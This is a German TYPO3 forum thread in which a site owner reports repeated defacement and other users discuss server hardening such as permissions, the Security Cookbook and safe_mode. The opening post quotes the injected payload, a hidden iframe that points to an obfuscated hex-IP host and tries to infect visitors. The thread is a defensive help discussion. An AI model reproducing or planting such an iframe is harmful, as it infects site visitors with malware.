Wiederholte Attacken auf Typo3-Seite [Gelöst]

  • chupa chupa
    T3PO
    0 x
    28 Beiträge
    2 Hilfreiche Beiträge
    16. 05. 2007, 02:26

    Auf meiner Typo3-Seite wird immer wieder ein Seitentitel verändert; und zwar wird dort

    <iframe src=http://0xcbdf9f69/google.com/AdSense.php style="display:none"></iframe>

    hinter dem Text des Seitentitels eingefügt und bei Besuchern, die IE haben, versucht, irgendeinen Dreck zu installieren. Inzwischen ist das ganze das 4 mal passiert. Im Änderungslog sind keine Aktivitäten darüber zu entdecken.

    Hatte jemand etwas Ähnliches schon einmal oder weiß jemand, wo ich anfangen könnte, dieses Leck abzudichten?


  • hepi hepi
    T3PO
    0 x
    12 Beiträge
    0 Hilfreiche Beiträge
    11. 07. 2007, 14:59

    [quote="Twinstar"]
    [quote="hepi"]

    Ja, richtig, aber in Deinem Fall ist wohl ein unkomfortables TYPO3 mit beschnittenem Extension Manager besser als ein gehacktes TYPO3 mit wochenlangem Katz und Maus-Spiel mit dem Hacker.

    Gruß
    Henning Pingel

    [/quote]

    Aha, gut. Damit kann ich was anfangen. Die Rechte manuell so zu ändern, daß man zum Ext. managen SSH braucht ist ja kein großer Akt. Mich wundert nur iregendwie, daß dieser Aspekt bisher so wenig in Typo3 Sicherheitsdiskussion kommuniziert ist.

    Denn wenn das so ein elementar wichtiger Punkt ist, sollten das doch auch am besten alle so machen, oder?!
    [/quote]

    Es gibt das Security Cookbook des TYPO3 Security Teams und andere Versuche des Teams, TYPO3-Administratoren für das Thema Security zu sensibilisieren. Die Adminstratoren selbst müssen sich aber natürlich auch Gedanken zum Thema Security machen, am besten natürlich, bevor eingebrochen wird. TYPO3 war und ist immer ein Projekt, das mit Hilfe von Ideen und Initiativen aus der Community verbessert worden ist.

    Viele Web-Applikationen brauchen Berechtigung zum Schreiben von Dateien im Webspace. TYPO3 könnte so, wie es ist, nicht existieren, ohne Schreibberechtigung in manchen Foldern. Redakteure könnten dann keine Bilder hochladen. Aber Du könntest als Admin halt überprüfen, was sich im Laufe der Zeit in den beschreibbaren Verzeichnissen ändert.

    Übrigens: Wenn der Hacker Dein SSH-Passwort kennt, ist natürlich auch die Änderung der Benutzerrechte zwecklos.

    Gruß
    Henning Pingel

  • Twinstar Twinstar
    Padawan
    0 x
    42 Beiträge
    0 Hilfreiche Beiträge
    11. 07. 2007, 15:13

    [quote="hepi"]

    Es gibt das Security Cookbook des TYPO3 Security Teams und andere Versuche des Teams, TYPO3-Administratoren für das Thema Security zu sensibilisieren. Die Adminstratoren selbst müssen sich aber natürlich auch Gedanken zum Thema Security machen, am besten natürlich, bevor eingebrochen wird. TYPO3 war und ist immer ein Projekt, das mit Hilfe von Ideen und Initiativen aus der Community verbessert worden ist.

    Gruß
    Henning Pingel
    [/quote]

    In der T3N Ausgabe 2.06 wird eine Checkliste zur Typo3 Umgebungs Konfiguration beschrieben. Ein Punkt ist safe_mode=On zu setzen. Jeder weiß, daß Typo3 damit nicht sehr weit kommt. Was ist davon zu halten?

  • hepi hepi
    T3PO
    0 x
    12 Beiträge
    0 Hilfreiche Beiträge
    11. 07. 2007, 15:29

    [quote="Twinstar"]

    In der T3N Ausgabe 2.06 wird eine Checkliste zur Typo3 Umgebungs Konfiguration beschrieben. Ein Punkt ist safe_mode=On zu setzen. Jeder weiß, daß Typo3 damit nicht sehr weit kommt. Was ist davon zu halten?
    [/quote]

    Im TYPO3 Security Cookbook (0.0.5), verlinkt auf http://typo3.org/teams/security, steht unter anderem : "use safemode, or at least open basedir to prevent webs from accessing other directories or execute things, they mustn't – again: less is more."

    Mehr werde ich zu der Frage nicht sagen, weil ich momentan keine gute Anwort geben kann und weil ich denke, dass das eben auch zur Verantwortung von Admins gehört, sich diese Frage selbst zu beantworten.

    Das soll nicht arrogant klingen, ich will nur auf folgendes hinaus: Du hast da einen Server stehen und installierst einfach eines der besten freien WCMS, das Dich nichts kostet und darüber hinaus auch noch genial im Funktionsumfang ist. Nun musst Du Dich irgendwann auch mal fragen: Was macht diese Software eigentlich, die ich da benutze? Wie funktioniert das genau? Wo funktioniert es nicht? Wie kann ich die Software gegen Angriffe schützen?

    Gruß
    Henning Pingel

  • Twinstar Twinstar
    Padawan
    0 x
    42 Beiträge
    0 Hilfreiche Beiträge
    11. 07. 2007, 15:45

    [quote="hepi"]
    Wie kann ich die Software gegen Angriffe schützen?
    Gruß
    Henning Pingel
    [/quote]

    Du hast vollkommen Recht. Will jetzt auch garnicht mehr weiter öffetnlich auf diesem Thema rumreiten. Nervt ja auch irgendwann. Berate mich mal lieber mit Leuten aus meinem IT Dunstkreis. Trotzdem vielen Dank für die vielen nützlichen Informationen.

  • InforMedic InforMedi...
    Jedi-Meister
    0 x
    394 Beiträge
    1 Hilfreiche Beiträge
    05. 09. 2007, 14:13

    [quote="Twinstar"]
    In der T3N Ausgabe 2.06 wird eine Checkliste zur Typo3 Umgebungs Konfiguration beschrieben. Ein Punkt ist safe_mode=On zu setzen. Jeder weiß, daß Typo3 damit nicht sehr weit kommt. Was ist davon zu halten?
    [/quote]

    Das ist doch Schwachsinn oder?
    Also ich weiss, dass wenn einer dann ich, bzw. der dummy vor dem PC und nicht typo3 der jenige ist, der vielleicht mit der Einstellung safe_mode = On nicht sehr weit kommt (bzw. kam) - mittlerweile betrifft mich das zumindest persönlich nicht mehr, da mein Server wunderbar mit safe_mode = On läuft!

    Ich könnte mir einen public Server mit Safe_Mode Off nicht einmal vorstellen #giggle#

    Grüße
    Info

    P.S.: Super Antworten & Fragen hier in diesem Post!!!! Hat mir einige nützliche Infos gegeben!!!!